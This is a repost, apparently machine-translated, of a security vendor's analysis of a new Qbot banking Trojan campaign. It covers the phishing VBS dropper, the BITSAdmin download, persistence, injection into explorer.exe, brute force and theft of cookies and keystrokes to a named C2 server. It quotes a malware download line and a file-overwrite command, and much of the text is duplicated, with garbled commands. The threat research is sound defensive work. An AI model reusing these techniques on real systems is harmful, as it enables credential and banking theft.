April 30, 2019 at 18:31Qbot is back. Varonis introduced a detailed analysis of the banking Trojan Qbot
The Varonis Security Research Group has discovered and investigated a
global cyber attack using a new strain of
Qbot malware. The campaign is actively targeting American corporations, but has hit networks around the world - with victims throughout Europe, Asia, Russia and South America - to steal confidential financial information, including bank account credentials.
During the analysis, we parsed the code for this variation of Qbot and identified a working attack control command center, which allowed us to determine the extent of the infection. Direct observations of the C2 server revealed that thousands of victims around the world are already compromised and are actively monitored by attackers. Additional information found on the C&C server also revealed traces of the direct participants behind this campaign.
The attack was originally discovered by Varonis DatAlert , one of our
North American customers. Varonis DatAlert warned about downloading suspicious software, moving inside the security perimeter (internal lateral movement), and suspicious network activity.
Our team is currently actively cooperating with the authorities investigating this incident and has provided them with additional non-public information. In this article, we will share information that is permitted for disclosure.
The operators of this malicious campaign used a new version of Qbot, a well-known and sophisticated malware designed to steal bank credentials. Qbot uses advanced anti-analysis methods, often shies away from detection and uses new infection vectors to get ahead of the available protective measures.
The malware is polymorphic and constantly changing itself:
Qbot (or Qakbot) was first identified in 2009 and has evolved significantly since then. It is primarily intended to collect data from online Internet sessions and data related to financial websites. Its network worm capabilities allow it to spread through the organization’s network and infect other systems.
Our team began an investigation after a customer’s call, where the already implemented DatAlert warned of suspicious activity in its systems. The investigation showed that
at least one computer was infected with malware, and attempts were made to spread to other network servers.
A sample of the worm was extracted and sent for analysis to the Varonis research team. The pattern did not match any existing hashes, and further research revealed that it was a new strain.
File Name: REQ_02132019b.doc.vbs
In previous versions of Qbot, a macro was run on the victim's computer inside a Word document. During our investigation, a zip file with the extension .doc.vbs was also detected, indicating that the initial infection was probably realized through a
phishing email, from which the malicious VBS script (Visual Basic Script) was launched.
Once executed, VBS identifies the operating system version of the victim machine and attempts to detect installed anti-virus software. The malware looks for the following lines: Defender, Virus, Antivirus, Malw, Trend, Kaspersky, Kav, McAfee, Symantec.
In the new version, the malware uses BITSAdmin to download the bootloader. This is a new behavior, as PowerShell was used in previous versions of the malware.
BITSAdmin downloads the bootloader from one of the following sites:
And here is the VBS code for downloading the bootloader using BITSAdmin:
File name: widgetcontrol.png
The bootloader, which contains the malware kernel, has several versions and is constantly updated even after execution. The version that the victim receives upon infection depends on the sp parameter , which is hardcoded in the VBS file.
The malicious feature is that each version of the bootloader is signed with different digital certificates. Trusted certificates usually indicate that the file is trusted, while unsigned executables are suspicious.
Qbot is known to use fake or stolen valid digital certificates to gain credibility and avoid detection in the operating system.
We downloaded all available versions of the bootloader (see Indicators of compromise below) and compared the certificates.
Certificates used by the malware:
An example of one of the certificates:
On first launch, the bootloader copies itself to% Appdata% \ Roaming \ {Random line} and then creates the following:
The bootloader launches the 32-bit explorer.exe explorer process and then injects the
main payloads into it .
Here is a dump of the explorer.exe process with the payload already installed as an RWX memory segment:
After implementation, the bootloader overwrites its original executable with the 32-bit version of calc.exe:
“C: \ Windows \ System32 \ cmd.exe” / c ping.exe -N 6 127.0.0.1 & type "C: \ Windows \ System32 \ calc.exe"> C: \ Users \ {TKTKTK} \ Desktop \ 1.exe
After being fixed in the system, the brute force module starts sorting passwords and accounts over the network. If the malware managed to compromise the domain account, then it reads the list of users of the Domain Users group and starts sorting through these accounts. If the local account is compromised, the malware uses a standard pre-configured list of local users. Authentication attempts use NTLM and the WNetAddConnection API.
We extracted the usernames and passwords used by the malware when trying to iterate through local accounts ( here ). A malicious program hides these dictionaries from static analysis, but they can be extracted at run time.
X32dbg explorer explorer image, which tries to connect to the remote computer with the Administrator user and password 12345678:
The main goal of Qbot is the theft of money from its victims; he uses several methods to steal financial, accounting and other information and send it to the attacker's server:
The figure below shows that during authentication on the bank's website buisnessline.huntington.com, the malicious program sends the data of POST requests and session cookies to the C2 server content.bigflimz.com:
On one of the attacker's sites, we were able to find log files containing the IP addresses of the victims, information about the operating system and the names of the anti-virus products. The C2 server showed information on past attacks, as well as additional versions of malware (the table of versions in the Compromise Indicators section below).
Some results may contain duplicates, but below are the top 10 countries, antivirus products, and operating systems found. It is also known that the victims of the attack were large financial organizations in Russia.
All data is uploaded to our Github repository .
We found 2,726 unique victim IPs. Since many organizations use NAT port address translation, which masks internal IP addresses, the number of victims,
probably there will be a lot more.
Figure: victims by country
Figure: victims by operating system
Figure: victims by antivirus used
All indicators of compromise can be found on Github here .
Loader Versions
A complete list can be found here .
global cyber attack using a new strain of
Qbot malware. The campaign is actively targeting American corporations, but has hit networks around the world - with victims throughout Europe, Asia, Russia and South America - to steal confidential financial information, including bank account credentials.
During the analysis, we parsed the code for this variation of Qbot and identified a working attack control command center, which allowed us to determine the extent of the infection. Direct observations of the C2 server revealed that thousands of victims around the world are already compromised and are actively monitored by attackers. Additional information found on the C&C server also revealed traces of the direct participants behind this campaign.
The attack was originally discovered by Varonis DatAlert , one of our
North American customers. Varonis DatAlert warned about downloading suspicious software, moving inside the security perimeter (internal lateral movement), and suspicious network activity.
Our team is currently actively cooperating with the authorities investigating this incident and has provided them with additional non-public information. In this article, we will share information that is permitted for disclosure.
New version of banking malware Qbot
The operators of this malicious campaign used a new version of Qbot, a well-known and sophisticated malware designed to steal bank credentials. Qbot uses advanced anti-analysis methods, often shies away from detection and uses new infection vectors to get ahead of the available protective measures.
The malware is polymorphic and constantly changing itself:
- she creates files and folders with random names
- its update loader often changes C2 server
- the malware downloader changes when there is an active Internet connection (more on this later)
Qbot (or Qakbot) was first identified in 2009 and has evolved significantly since then. It is primarily intended to collect data from online Internet sessions and data related to financial websites. Its network worm capabilities allow it to spread through the organization’s network and infect other systems.
Detection
Our team began an investigation after a customer’s call, where the already implemented DatAlert warned of suspicious activity in its systems. The investigation showed that
at least one computer was infected with malware, and attempts were made to spread to other network servers.
A sample of the worm was extracted and sent for analysis to the Varonis research team. The pattern did not match any existing hashes, and further research revealed that it was a new strain.
Stage one: dropper
File Name: REQ_02132019b.doc.vbs
In previous versions of Qbot, a macro was run on the victim's computer inside a Word document. During our investigation, a zip file with the extension .doc.vbs was also detected, indicating that the initial infection was probably realized through a
phishing email, from which the malicious VBS script (Visual Basic Script) was launched.
Once executed, VBS identifies the operating system version of the victim machine and attempts to detect installed anti-virus software. The malware looks for the following lines: Defender, Virus, Antivirus, Malw, Trend, Kaspersky, Kav, McAfee, Symantec.
In the new version, the malware uses BITSAdmin to download the bootloader. This is a new behavior, as PowerShell was used in previous versions of the malware.
BITSAdmin downloads the bootloader from one of the following sites:
And here is the VBS code for downloading the bootloader using BITSAdmin:
intReturn = wShell.Run ('bitsadmin / transfer qahdejob' & Second (Now) & '/ Priority HIGH '& el & urlStr ‘ ' & tempFile, 0, True)The second stage: to gain a foothold and take root in explorer.exe
File name: widgetcontrol.png
The bootloader, which contains the malware kernel, has several versions and is constantly updated even after execution. The version that the victim receives upon infection depends on the sp parameter , which is hardcoded in the VBS file.
The malicious feature is that each version of the bootloader is signed with different digital certificates. Trusted certificates usually indicate that the file is trusted, while unsigned executables are suspicious.
Qbot is known to use fake or stolen valid digital certificates to gain credibility and avoid detection in the operating system.
We downloaded all available versions of the bootloader (see Indicators of compromise below) and compared the certificates.
Certificates used by the malware:
- Saiitech Systems Limited
- Ecdjb limited
- Hitish Patel Consulting Ltd
- Doorga limited
- INTENTEK LIMITED
- Austek Consulting Limited
- IO Pro Limited
- Vercoe IT Ltd
- Edsabame Consultants Ltd
- SOVA CONSULTANCY LTD
An example of one of the certificates:
Fastening
On first launch, the bootloader copies itself to% Appdata% \ Roaming \ {Random line} and then creates the following:
- Register: writes itself to a well-known registry key to execute when a user logs in:
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run - Task Scheduler: a task is created to launch malware every 5 hours from the following path
% Appdata% \ Roaming \ Microsoft \ {Randomized String} - Startup: Qbot creates a shortcut in the Startup-user directory to autorun
Infected Explorer.exe
The bootloader launches the 32-bit explorer.exe explorer process and then injects the
main payloads into it .
Here is a dump of the explorer.exe process with the payload already installed as an RWX memory segment:
After implementation, the bootloader overwrites its original executable with the 32-bit version of calc.exe:
“C: \ Windows \ System32 \ cmd.exe” / c ping.exe -N 6 127.0.0.1 & type "C: \ Windows \ System32 \ calc.exe"> C: \ Users \ {TKTKTK} \ Desktop \ 1.exe
Stage Three: quietly sneak up and steal money
After being fixed in the system, the brute force module starts sorting passwords and accounts over the network. If the malware managed to compromise the domain account, then it reads the list of users of the Domain Users group and starts sorting through these accounts. If the local account is compromised, the malware uses a standard pre-configured list of local users. Authentication attempts use NTLM and the WNetAddConnection API.
We extracted the usernames and passwords used by the malware when trying to iterate through local accounts ( here ). A malicious program hides these dictionaries from static analysis, but they can be extracted at run time.
X32dbg explorer explorer image, which tries to connect to the remote computer with the Administrator user and password 12345678:
Carry your money
The main goal of Qbot is the theft of money from its victims; he uses several methods to steal financial, accounting and other information and send it to the attacker's server:
- Keylogger - Qbot captures and sends each keystroke that the victim enters and downloads them to an attacker
- Credentials / session cookies - Qbot searches for stored credentials / cookies from browsers and sends them to an attacker
- Wiretapping - the malicious payload is embedded in all processes in the system with code that intercepts API calls and looks for financial / banking lines, credentials or session cookies from the process and loads them to the attacker.
The figure below shows that during authentication on the bank's website buisnessline.huntington.com, the malicious program sends the data of POST requests and session cookies to the C2 server content.bigflimz.com:
Inside a C2 attacker server
On one of the attacker's sites, we were able to find log files containing the IP addresses of the victims, information about the operating system and the names of the anti-virus products. The C2 server showed information on past attacks, as well as additional versions of malware (the table of versions in the Compromise Indicators section below).
Some results may contain duplicates, but below are the top 10 countries, antivirus products, and operating systems found. It is also known that the victims of the attack were large financial organizations in Russia.
All data is uploaded to our Github repository .
We found 2,726 unique victim IPs. Since many organizations use NAT port address translation, which masks internal IP addresses, the number of victims,
probably there will be a lot more.
Figure: victims by country
Figure: victims by operating system
Figure: victims by antivirus used
Compromise Indicators
All indicators of compromise can be found on Github here .
Loader Versions
A complete list can be found here .